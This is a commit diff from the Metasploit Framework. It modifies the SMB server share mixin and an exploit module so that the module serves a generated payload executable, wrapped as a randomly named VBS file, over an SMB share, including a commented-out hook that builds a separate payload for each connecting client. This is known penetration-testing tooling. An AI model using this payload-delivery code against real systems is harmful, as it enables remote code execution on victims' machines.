support changing files
jvazquez-r7
parent
b2e17a61a9
commit
ca6a5cad17
|
|
@ -26,11 +26,13 @@ module Msf
|
|||
payload = file_name
|
||||
end
|
||||
|
||||
contents = smb[:payload] || file_contents
|
||||
|
||||
if payload.ends_with?(file_name.downcase)
|
||||
vprint_status("SMB Share - #{smb[:ip]} SMB_COM_NT_CREATE_ANDX request for #{unc}... ")
|
||||
fid = smb[:file_id].to_i
|
||||
attribs = CONST::SMB_EXT_FILE_ATTR_NORMAL
|
||||
eof = file_contents.length
|
||||
eof = contents.length
|
||||
is_dir = 0
|
||||
elsif folder_name && payload.ends_with?(folder_name.downcase)
|
||||
fid = smb[:dir_id].to_i
|
||||
|
|
|
|||
|
|
@ -13,16 +13,19 @@ module Msf
|
|||
# @param buff [String] The data including the client request.
|
||||
# @return [Fixnum] The number of bytes returned to the client as response.
|
||||
def smb_cmd_read_andx(c, buff)
|
||||
smb = @state[c]
|
||||
pkt = CONST::SMB_READ_PKT.make_struct
|
||||
pkt.from_s(buff)
|
||||
|
||||
offset = pkt['Payload'].v['Offset']
|
||||
length = pkt['Payload'].v['MaxCountLow']
|
||||
|
||||
contents = smb[:payload] || file_contents
|
||||
|
||||
send_read_andx_res(c, {
|
||||
data_len_low: length,
|
||||
byte_count: length,
|
||||
data: file_contents[offset, length]
|
||||
data: contents[offset, length]
|
||||
})
|
||||
end
|
||||
|
||||
|
|
|
|||
|
|
@ -13,10 +13,13 @@ module Msf
|
|||
# @param path [String] The path which the client is requesting info from.
|
||||
# @return [Fixnum] The number of bytes returned to the client as response.
|
||||
def smb_cmd_find_file_both_directory_info(c, path)
|
||||
smb = @state[c]
|
||||
|
||||
contents = smb[:payload] || file_contents
|
||||
|
||||
if path && path.include?(file_name.downcase)
|
||||
data = Rex::Text.to_unicode(file_name)
|
||||
length = file_contents.length
|
||||
length = contents.length
|
||||
ea = 0
|
||||
alloc = 1048576 # Allocation Size = 1048576 || 1Mb
|
||||
attrib = CONST::SMB_EXT_FILE_ATTR_NORMAL
|
||||
|
|
@ -77,10 +80,13 @@ module Msf
|
|||
# @param path [String] The path which the client is requesting info from.
|
||||
# @return [Fixnum] The number of bytes returned to the client as response.
|
||||
def smb_cmd_find_file_full_directory_info(c, path)
|
||||
smb = @state[c]
|
||||
|
||||
contents = smb[:payload] || file_contents
|
||||
|
||||
if path && path.include?(file_name.downcase)
|
||||
data = Rex::Text.to_unicode(file_name)
|
||||
length = file_contents.length
|
||||
length = contents.length
|
||||
ea = 0
|
||||
alloc = 1048576 # Allocation Size = 1048576 || 1Mb
|
||||
attrib = CONST::SMB_EXT_FILE_ATTR_NORMAL # File
|
||||
|
|
|
|||
|
|
@ -33,12 +33,16 @@ module Msf
|
|||
# @param fid [Fixnum] The file identifier which the client is requesting info from.
|
||||
# @return [Fixnum] The number of bytes returned to the client as response.
|
||||
def smb_cmd_trans_query_file_info_standard(c, fid)
|
||||
smb = @state[c]
|
||||
|
||||
contents = smb[:payload] || file_contents
|
||||
|
||||
send_info_standard_res(c, {
|
||||
allocation_size: 1048576,
|
||||
number_links: 1,
|
||||
delete_pending: 0,
|
||||
directory: 0,
|
||||
end_of_file: file_contents.length
|
||||
end_of_file: contents.length
|
||||
})
|
||||
end
|
||||
|
||||
|
|
@ -69,6 +73,10 @@ module Msf
|
|||
# @param path [String] The path which the client is requesting info from.
|
||||
# @return [Fixnum] The number of bytes returned to the client as response.
|
||||
def smb_cmd_trans_query_path_info_standard(c, path)
|
||||
smb = @state[c]
|
||||
|
||||
contents = smb[:payload] || file_contents
|
||||
|
||||
if path && path.include?(file_name.downcase)
|
||||
attrib = 0 # File attributes => file
|
||||
elsif path && folder_name && path.ends_with?(folder_name.downcase)
|
||||
|
|
@ -84,7 +92,7 @@ module Msf
|
|||
number_links: 1,
|
||||
delete_pending: 0,
|
||||
directory: attrib,
|
||||
end_of_file: file_contents.length
|
||||
end_of_file: contents.length
|
||||
})
|
||||
end
|
||||
|
||||
|
|
@ -95,6 +103,9 @@ module Msf
|
|||
# @param path [String] The path which the client is requesting info from.
|
||||
# @return [Fixnum] The number of bytes returned to the client as response.
|
||||
def smb_cmd_trans_query_path_info_network(c, path)
|
||||
smb = @state[c]
|
||||
|
||||
contents = smb[:payload] || file_contents
|
||||
|
||||
if path && path.include?(file_name.downcase)
|
||||
attrib = CONST::SMB_EXT_FILE_ATTR_NORMAL
|
||||
|
|
@ -108,7 +119,7 @@ module Msf
|
|||
|
||||
send_info_network_res(c, {
|
||||
allocation_size: 1048576,
|
||||
end_of_file: file_contents.length,
|
||||
end_of_file: contents.length,
|
||||
file_attributes: attrib
|
||||
})
|
||||
end
|
||||
|
|
|
|||
|
|
@ -9,7 +9,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
Rank = ManualRanking
|
||||
|
||||
include Msf::Exploit::Remote::SMB::Server::Share
|
||||
include Msf::Exploit::EXE
|
||||
|
||||
def initialize(info={})
|
||||
super(update_info(info,
|
||||
|
|
@ -63,11 +62,22 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
def setup
|
||||
super
|
||||
|
||||
exe = generate_payload_exe
|
||||
self.file_contents = Msf::Util::EXE.to_exe_vbs(exe)
|
||||
self.file_name = datastore['FILE_NAME'] || "#{Rex::Text.rand_text_alpha(4 + rand(3))}.vbs"
|
||||
exe = payload.encoded_exe
|
||||
self.file_contents = Msf::Util::EXE.to_exe_vbs(exe)
|
||||
print_status("File available on #{unc}...")
|
||||
end
|
||||
=begin
|
||||
def on_client_connect(client)
|
||||
super(client)
|
||||
|
||||
smb = @state[client]
|
||||
|
||||
unless smb[:payload]
|
||||
p = regenerate_payload(client)
|
||||
exe = p.encoded_exe
|
||||
smb[:payload] = Msf::Util::EXE.to_exe_vbs(exe)
|
||||
end
|
||||
end
|
||||
=end
|
||||
end
|
||||
|
|
|
|||
Loading…
Reference in New Issue